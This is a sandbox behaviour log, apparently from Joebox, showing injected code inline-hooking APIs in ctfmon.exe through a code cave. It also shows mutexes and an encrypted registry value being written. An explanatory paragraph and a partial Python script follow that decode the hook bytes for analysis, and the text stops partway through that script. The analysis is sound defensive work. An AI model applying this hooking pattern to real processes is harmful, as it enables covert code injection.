Memory read PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7C811195 Length: 30 Value: 8B FF 55 8B EC 83 EC 64 83 7D 0C 01 56 57 0F 8D 13 AE 01 00 33 F6 39 75 0C 0F 8C 08 AE 01 success or wait 1999550564
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0014 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999550869
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999551160
Memory written PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0014 Length: 10 Value: 8B FF 55 8B EC E9 7C 11 C5 7B success or wait 1999551492
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7C811195 Length: 1000 New Protection: page execute and read and write New Protection: page execute and write copy success or wait 1999551757
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7C811000 Length: 1000 New Protection: page execute and write copy New Protection: page execute and write copy success or wait 1999552047
Memory written PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7C811195 Length: 5 Value: E9 CE 79 22 84 success or wait 1999552371
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7C811195 Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 1999552680
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 3D94FABE Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 1999554302
Memory read PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 3D94FABE Length: 30 Value: 8B FF 55 8B EC 51 51 53 56 33 DB 57 33 F6 33 FF 39 5D 08 89 5D FC 89 5D F8 0F 84 2A EB 03 success or wait 1999554587
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC001E Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999554945
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999555235
Memory written PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC001E Length: 10 Value: 8B FF 55 8B EC E9 9B FA D8 3C success or wait 1999555567
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 3D94FABE Length: 1000 New Protection: page execute and read and write New Protection: page execute and write copy success or wait 1999555831
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 3D94F000 Length: 1000 New Protection: page execute and write copy New Protection: page execute and write copy success or wait 1999556225
Memory written PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 3D94FABE Length: 5 Value: E9 97 45 0F C3 success or wait 1999556554
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 3D94FABE Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 1999556866
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 3D95EE89 Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 1999558254
Memory read PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 3D95EE89 Length: 30 Value: 8B FF 55 8B EC 6A 10 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 19 FD FE FF 5D success or wait 1999558543
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0028 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999558899
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999559191
Memory written PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0028 Length: 10 Value: 8B FF 55 8B EC E9 5C EE D9 3C success or wait 1999559524
Memory written PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 3D95EE89 Length: 5 Value: E9 20 52 0E C3 success or wait 1999560411
Memory read PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 3D9BA6BF Length: 30 Value: 8B FF 55 8B EC 51 51 53 33 C0 21 45 FC 21 45 F8 56 57 33 FF 33 DB 33 C9 33 D2 39 45 08 75 success or wait 1999561648
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999562292
Memory written PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0032 Length: 10 Value: 8B FF 55 8B EC E9 88 A6 DF 3C success or wait 1999562626
Memory written PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 3D9BA6BF Length: 5 Value: E9 3E 9A 08 C3 success or wait 1999563513
Memory read PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 3D9BA666 Length: 30 Value: 8B FF 55 8B EC 53 56 57 33 DB 33 C9 33 D2 33 F6 33 FF 39 5D 10 75 2C 8B 45 0C 85 C0 74 14 success or wait 1999564740
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999565333
Memory written PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC003C Length: 10 Value: 8B FF 55 8B EC E9 25 A6 DF 3C success or wait 1999565666
Memory written PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 3D9BA666 Length: 5 Value: E9 33 9B 08 C3 success or wait 1999566549
Memory read PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 3D949088 Length: 30 Value: 8B FF 55 8B EC 51 51 53 56 57 33 DB 33 FF F6 05 78 11 9E 3D 01 89 5D FC 0F 84 D9 6A 01 00 success or wait 1999568148
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999568804
Memory written PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0046 Length: 10 Value: 8B FF 55 8B EC E9 3D 90 D8 3C success or wait 1999569141
Memory written PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 3D949088 Length: 5 Value: E9 AD B1 0F C3 success or wait 1999570028
Memory read PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 3D94654B Length: 30 Value: 8B FF 55 8B EC 83 EC 24 53 56 57 33 FF 39 3D B8 11 9E 3D 89 7D F4 89 7D F8 89 7D F0 C7 45 success or wait 1999572287
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999572935
Memory written PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0050 Length: 10 Value: 8B FF 55 8B EC E9 F6 64 D8 3C success or wait 1999573268
Memory written PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 3D94654B Length: 5 Value: E9 2D DD 0F C3 success or wait 1999574153
Memory read PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 3D963381 Length: 30 Value: 8B FF 55 8B EC 83 EC 20 53 33 DB 39 1D B8 11 9E 3D 56 57 89 5D FC 89 5D F4 89 5D F8 C7 45 success or wait 1999576160
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999576804
Memory written PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC005A Length: 10 Value: 8B FF 55 8B EC E9 22 33 DA 3C success or wait 1999577136
Memory written PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 3D963381 Length: 5 Value: E9 36 0F 0E C3 success or wait 1999578019
Memory read PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 3D94BF83 Length: 30 Value: 8B FF 55 8B EC 83 EC 10 53 33 DB 39 1D B8 11 9E 3D 56 57 89 5D FC C7 45 F8 01 00 00 00 0F success or wait 1999580220
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999580866
Memory written PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0064 Length: 10 Value: 8B FF 55 8B EC E9 1A BF D8 3C success or wait 1999581198
Memory written PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 3D94BF83 Length: 5 Value: E9 7E 83 0F C3 success or wait 1999582085
Memory read PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 3D94878D Length: 30 Value: 8B FF 55 8B EC 83 EC 10 53 33 DB 39 1D B8 11 9E 3D 56 57 89 5D F8 89 5D FC 0F 84 C3 65 04 success or wait 1999584300
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999584945
Memory written PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC006E Length: 10 Value: 8B FF 55 8B EC E9 1A 87 D8 3C success or wait 1999585277
Memory written PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 3D94878D Length: 5 Value: E9 A0 BB 0F C3 success or wait 1999586164
Memory read PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 71AB3E2B Length: 30 Value: 8B FF 55 8B EC 51 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 BC 4F 00 00 E8 3A E8 FF FF 85 C0 success or wait 1999587192
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999587841
Memory written PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0078 Length: 10 Value: 8B FF 55 8B EC E9 AE 3D EF 70 success or wait 1999588171
Memory read PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 71AB4C27 Length: 30 Value: 8B FF 55 8B EC 83 EC 10 56 57 33 FF 81 3D 50 40 AC 71 29 2C AB 71 0F 84 25 6A 00 00 8D 45 success or wait 1999590068
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999590809
Memory read PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 71AB68FA Length: 30 Value: 8B FF 55 8B EC 51 51 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 CD 4D 00 00 8D 45 F8 50 E8 98 success or wait 1999593038
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999593637
Memory read PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7E41ECA3 Length: 30 Value: B8 D7 11 00 00 BA 00 03 FE 7F FF 12 C2 0C 00 90 90 90 90 90 6A 2F 6A 01 E8 EE 97 FF FF 6A success or wait 1999596181
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999596776
Memory read PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7E41FE6E Length: 30 Value: B8 2E 12 00 00 BA 00 03 FE 7F FF 12 C2 04 00 33 FF 47 83 7D E4 FF 0F 85 AC AC FF FF C7 45 success or wait 1999599228
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999599823
Memory read PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7E428D20 Length: 30 Value: 6A 14 68 90 8D 42 7E E8 94 F8 FE FF E8 0B F9 FE FF 83 3D 8C 10 47 7E 00 75 08 85 C0 0F 84 success or wait 1999602261
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999602855
Memory read PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7E42C17E Length: 30 Value: 6A 14 68 F0 C1 42 7E E8 36 C4 FE FF E8 AD C4 FE FF 83 3D 8C 10 47 7E 00 75 08 85 C0 0F 84 success or wait 1999605297
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999605890
Memory read PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7E423D3A Length: 30 Value: 8B FF 55 8B EC 8B 4D 08 E8 99 47 FF FF 85 C0 74 11 6A 00 FF 75 14 FF 75 10 FF 75 0C 50 E8 success or wait 1999608340
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999608935
Memory read PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7E43E577 Length: 30 Value: 8B FF 55 8B EC 8B 4D 08 E8 5C 9F FD FF 85 C0 74 11 6A 01 FF 75 14 FF 75 10 FF 75 0C 50 E8 success or wait 1999611327
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999611922
Memory read PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7E430833 Length: 30 Value: 8B FF 55 8B EC 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 09 00 00 00 5D C2 14 success or wait 1999614360
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999614952
Memory read PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7E44F965 Length: 30 Value: 8B FF 55 8B EC 6A 01 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 D7 0E FE FF 5D C2 14 success or wait 1999617143
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999617738
Memory read PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7E430A47 Length: 30 Value: 8B FF 55 8B EC 6A 00 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 09 00 00 00 5D C2 10 00 90 90 success or wait 1999620172
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999620764
Memory read PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7E44F9B4 Length: 30 Value: 8B FF 55 8B EC 6A 01 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 9C 10 FE FF 5D C2 10 00 90 90 success or wait 1999622906
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999623979
Memory read PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7E42A01E Length: 30 Value: 8B FF 55 8B EC 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 89 FF FF FF 5D C2 14 success or wait 1999626474
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999627075
Memory read PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7E42A97D Length: 30 Value: 8B FF 55 8B EC 6A 01 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 2A F6 FF FF 5D C2 14 success or wait 1999629446
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999630042
Memory read PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7E41A39A Length: 30 Value: 8B FF 55 8B EC 83 EC 30 8B 45 08 56 57 6A 09 59 8D 70 04 8B 00 8D 7D D8 F3 A5 89 45 D4 33 success or wait 1999632456
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999633052
Memory read PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7E42EA5E Length: 30 Value: 8B FF 55 8B EC 83 EC 30 8B 45 08 56 57 6A 09 59 8D 70 04 8B 00 8D 7D D8 F3 A5 89 45 D4 33 success or wait 1999635495
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999636089
Memory read PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7E41AF7F Length: 30 Value: 8B FF 55 8B EC 8B 45 08 83 38 30 0F 85 0B E7 02 00 68 00 01 00 00 6A 00 6A 00 50 E8 C5 F1 success or wait 1999638546
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999639140
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999642455
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999646269
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999649295
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999652376
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999655475
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999658531
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999661588
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999664701
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999667685
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999670721
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999673711
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999676420
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999679672
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999686369
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999689379
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999692478
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999695477
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999698570
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999701483
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999704492
System info queried Type: ProcessInformation success or wait 1999713354
Section loaded Path: none Access: query and write and read Type: commit Baseaddress: C20000 Size: 12288 Protection: read write Mapped to pid: own pid success or wait 1999722469
Thread created PID: 1828 TID: 908 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\ctfmon.exe Injected: false success or wait 1999861973
Mutant created Name: \BaseNamedObjects\Local\{5B619F6A-A7F7-7417-185B-81F8EE8A3A3D} object name exists 1999863845
System info queried Type: ProcessInformation success or wait 1999865066
Section loaded Path: none Access: query and write and read Type: commit Baseaddress: C20000 Size: 12288 Protection: read write Mapped to pid: own pid success or wait 1999871887
Thread created PID: 1828 TID: 2392 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\ctfmon.exe Injected: false success or wait 2000007198
Mutant created Name: \BaseNamedObjects\Global\{50BFCA5C-F2C1-7FC9-185B-81F8EE8A3A3D} success or wait 2000008222
Mutant created Name: \BaseNamedObjects\Local\{5B619F69-A7F4-7417-185B-81F8EE8A3A3D} object name exists 2000009071
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: Okmaykid success or wait 2000009578
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: Okmaykid success or wait 2000010111
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid Name: Okmaykid Type: Binary Data: 96 8D 31 C9 C5 75 08 F8 84 53 9B D1 F4 B9 61 28 10 B5 F1 08 71 3F 43 D6 C5 E1 62 1A C6 5B 19 DC CC D6 C6 9D C6 B3 0A 3C 08 2E 18 33 00 4D BE 0B 36 BD B7 A3 BD 92 EA 03 1F E4 1B C7 16 2B 45 CA B5 08 9E BA 6B 0D 91 DA 05 B1 6F 8F BD 44 64 5A BF 72 4F 66 A5 9E C5 70 A4 30 85 A9 DA E1 B0 C2 84 42 08 3E FA A7 EC BB C8 A3 E1 74 73 02 2C 20 4D 52 81 9C success or wait 2000012139
+ Sections
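Reading the ctfmon.exe rows above as a sequence: for each target API the injected code reads the first bytes of the function (the 30-byte Memory read rows), copies those bytes followed by a 5-byte E9 jmp into the code cave at BC0000 (the 10-byte Memory written rows at BC000A, BC0014, BC001E, ...; that page stays page execute and read and write throughout), makes the API's page writable, overwrites the function's first five bytes with E9 plus a 32-bit displacement into its own code (the 5-byte rows), and puts the page back to page execute read. The attribute rows print two fields both labelled New Protection; read against that sequence (execute-read-write requested before the write, execute-read after it), the second field is the protection the page had before the call. Decoding one pair by hand: E9 94 27 12 84 written at 7C91632D lands at 00A38AC6 (the displacement is signed, and the sum wraps at 32 bits), while the E9 1E 63 D5 7B at the tail of the BC000A blob lands at 7C916332, exactly five bytes past the patched prologue. That chain (patched API, detour handler, trampoline holding the stolen bytes) is what distinguishes an inline hook from an ordinary cross-process write. ws2_32.dll at 71AB0000 and WININET at 3D930000 are listed in the section table further down; the 7C90xxxx and 7C81xxxx targets sit in the XP ntdll/kernel32 range, and the 7E41xxxx targets belong to a module this part of the report does not list.

The script below is an added example, not part of the Joebox report or of Joebox itself. It parses both row shapes the report uses (the chronological "Memory written PID: ... Value: ..." lines and the per-process table rows such as the wscntfy.exe ones at the end of this section), decodes every 5-byte E9 patch, pairs it with the trampoline that jumps back to patch address + stolen length, and cross-checks the stolen bytes against the prologue that was read before patching. SAMPLE_ROWS are copied from the report; the two regexes are my reading of its row format, and the Length column is deliberately ignored because the report prints it in decimal for these rows but in hex for page sizes.

```python
"""Reconstruct the inline (detour) hooks behind the 'Memory read' / 'Memory written' rows
of this Joebox report.  Added example, not part of the report.  SAMPLE_ROWS are copied
verbatim from the report; the two row regexes are my reading of its row shapes."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Chronological-log rows ("Memory written PID: 1828 Path: ... Base: BC000A Length: 10 Value: 68 6C ... success ...")
LOG_ROW = re.compile(r"Memory (?:written|read) PID: (?P<pid>\d+) Path: (?P<path>\S+) "
                     r"Base: (?P<base>[0-9A-Fa-f]+) Length: \S+ Value: (?P<val>(?:[0-9A-Fa-f]{2} )+)")
# Per-process table rows ("236 C:\WINDOWS\system32\wscntfy.exe E00000 10 B8 35 ... success or wait 1 AFA569")
TABLE_ROW = re.compile(r"^(?P<pid>\d+) (?P<path>\S+) (?P<base>[0-9A-Fa-f]+) \S+ (?P<val>(?:[0-9A-Fa-f]{2} )+)")
# The Length column is ignored (decimal for these rows, hex for page sizes); the listed bytes are counted instead.

SAMPLE_ROWS = [
    # ctfmon.exe, PID 1828: read the API prologue, write stolen bytes + jmp into the BC00xx code cave, patch the API
    r"Memory read PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7C91632D Length: 30 Value: 68 6C 02 00 00 68 80 64 91 7C "
    r"E8 8F 85 FF FF A1 C8 E0 97 7C 89 45 E4 8B 45 08 89 85 B4 FD success or wait 1999547457",
    r"Memory written PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC000A Length: 10 Value: 68 6C 02 00 00 E9 1E 63 D5 7B success or wait 1999548381",
    r"Memory written PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7C91632D Length: 5 Value: E9 94 27 12 84 success or wait 1999549262",
    r"Memory read PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7C811195 Length: 30 Value: 8B FF 55 8B EC 83 EC 64 83 7D "
    r"0C 01 56 57 0F 8D 13 AE 01 00 33 F6 39 75 0C 0F 8C 08 AE 01 success or wait 1999550564",
    r"Memory written PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0014 Length: 10 Value: 8B FF 55 8B EC E9 7C 11 C5 7B success or wait 1999551492",
    r"Memory written PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7C811195 Length: 5 Value: E9 CE 79 22 84 success or wait 1999552371",
    # a protection change carries no bytes and is skipped by both regexes
    r"Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7C811195 Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 1999552680",
    # wscntfy.exe, PID 236, table form: the same three-step pattern with the code cave at E00000
    r"236 C:\WINDOWS\system32\wscntfy.exe 7C90D1AE 30 B8 35 00 00 00 BA 00 03 FE 7F FF 12 C2 20 00 90 B8 36 00 00 00 BA 00 03 FE 7F FF 12 C2 10 success or wait 1 AFA4F3",
    r"236 C:\WINDOWS\system32\wscntfy.exe E00000 10 B8 35 00 00 00 E9 A9 D1 B0 7B success or wait 1 AFA569",
    r"236 C:\WINDOWS\system32\wscntfy.exe 7C90D1AE 5 E9 33 B7 1D 84 success or wait 1 AFA591",
]


@dataclass
class MemOp:
    pid: int
    addr: int
    data: bytes


def parse_rows(lines: List[str]) -> List[MemOp]:
    """Turn report rows of either shape into (pid, address, bytes); everything else is dropped."""
    ops = []
    for line in lines:
        m = LOG_ROW.search(line) or TABLE_ROW.match(line)
        if m:
            ops.append(MemOp(int(m["pid"]), int(m["base"], 16), bytes.fromhex(m["val"].replace(" ", ""))))
    return ops


def jmp_target(addr: int, data: bytes, off: int = 0) -> Optional[int]:
    """Decode x86 'E9 rel32' at data[off:off+5] located at addr+off.  rel32 is signed and relative
    to the end of the instruction; the sum wraps at 32 bits (7C91632D+5 + 0x84122794 -> 00A38AC6)."""
    if len(data) < off + 5 or data[off] != 0xE9:
        return None
    rel = int.from_bytes(data[off + 1:off + 5], "little", signed=True)
    return (addr + off + 5 + rel) & 0xFFFFFFFF


@dataclass
class InlineHook:
    pid: int
    hooked: int                        # API address whose first bytes became 'jmp handler'
    handler: int                       # where that jmp lands (the injected code)
    trampoline: Optional[int]          # code cave holding the stolen prologue + 'jmp hooked+n'
    stolen: bytes
    prologue_matches: Optional[bool]   # stolen bytes == bytes read from the API before patching


def find_inline_hooks(ops: List[MemOp]) -> List[InlineHook]:
    # Trampoline candidates: a blob of >= 10 bytes ending in a jmp, keyed by (pid, jmp destination).
    tramps: Dict[Tuple[int, int], MemOp] = {}
    for op in ops:
        if len(op.data) >= 10:
            ret = jmp_target(op.addr, op.data, len(op.data) - 5)
            if ret is not None:
                tramps[(op.pid, ret)] = op
    # Prologue snapshots: blobs longer than a patch that do not themselves start with a jmp.
    originals = {(op.pid, op.addr): op.data for op in ops if len(op.data) > 5 and op.data[0] != 0xE9}
    hooks = []
    for op in ops:
        if len(op.data) != 5 or op.data[0] != 0xE9:
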